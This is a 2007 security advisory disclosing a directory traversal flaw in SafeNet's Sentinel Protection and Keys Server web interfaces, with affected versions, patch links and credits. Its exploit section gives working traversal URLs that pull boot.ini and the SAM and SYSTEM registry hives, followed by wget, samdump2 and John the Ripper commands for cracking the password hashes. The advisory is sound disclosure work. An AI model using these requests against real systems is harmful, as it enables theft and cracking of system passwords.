sentineldetails-traverse.txt

`SUMMARY  
=======  
  
SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server  
products include web servers which are vulnerable to directory  
traversal attacks. A remote attacker could exploit these  
vulnerabilities to read arbitrary files with the permissions of the web  
server, typically SYSTEM.  
  
AFFECTED SOFTWARE  
=================  
  
* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below  
* Sentinel Keys Server 1.0.3 and possibly below  
  
UNAFFECTED  
==========  
  
* Sentinel Protection Server 7.4.1  
* Sentinel Keys Server 1.0.4  
  
IMPACT  
======  
  
A remote attacker could exploit this vulnerability to read sensitive  
files on the affected system. Attractive targets include the SAM  
registry hive which contains system password hashes.  
  
DETAILS  
=======  
  
Sentinel Protection Server and Sentinel Keys Server run web servers on  
ports 6002 and 7002, respectively, to allow remote monitoring of key  
use. The web server software does not santize request paths correctly  
before using them in system calls. As a result, an attacker can request  
files outside the web server's directory root by using the ../ notation  
to refer to the parent directory of the current directory.  
  
SOLUTION  
========  
  
Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server  
1.0.4.  
  
First upgrade the Sentinel Driver software to 7.4.0 if you are using an  
earlier version.  
  
http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip  
  
Then install "Security Patch to Sentinel Protection Installer 7.4.0"  
  
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip  
  
EXPLOIT  
=======  
  
Most popular web browsers are not be able to display URLs exploiting  
this problem. I recommend using wget or lynx instead.  
  
Substitute port 7002 to target Keys Server instead of Protection  
Server.  
  
This example will retrieve the C:\boot.ini file.  
  
http://XX.XX.XX.XX:6002/../../../../../../boot.ini  
  
This example will retrieve a copy of the target system's SAM registry  
hive from the Windows repair folder:  
  
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam  
  
With the SAM and SYSTEM registry hives, it is possible to extract the  
system's local password hashes for offline cracking. For example, using the  
bkhive, samdump2, and John the Ripper tools:  
  
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam  
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system  
$ bkhive system keyfile  
$ samdump2 sam keyfile > hashes  
$ john --wordlist=all hashes  
  
http://ophcrack.sourceforge.net/bkhive.php  
http://www.openwall.com/john/  
  
ACKNOWLEDGMENTS  
===============  
  
Thanks to SafeNet for patching this vulnerability and for working with  
me on this advisory.  
  
According to Digital Defense, Inc.'s advisory, Corey Lebleu originally  
discovered this problem on October 10th, 2007. I discovered the same  
vulnerability independently on October 29th, 2007. I have no reason to  
doubt Digital Defense, Inc.'s claim, and do not claim to have  
discovered the problem first.  
  
REVISION HISTORY  
================  
  
2007-11-26 original release  
  
--   
Elliot Kendall <[email protected]>  
Network Security Architect  
Brandeis University  
  
Trouble replying? See http://people.brandeis.edu/~ekendall/sign/  
`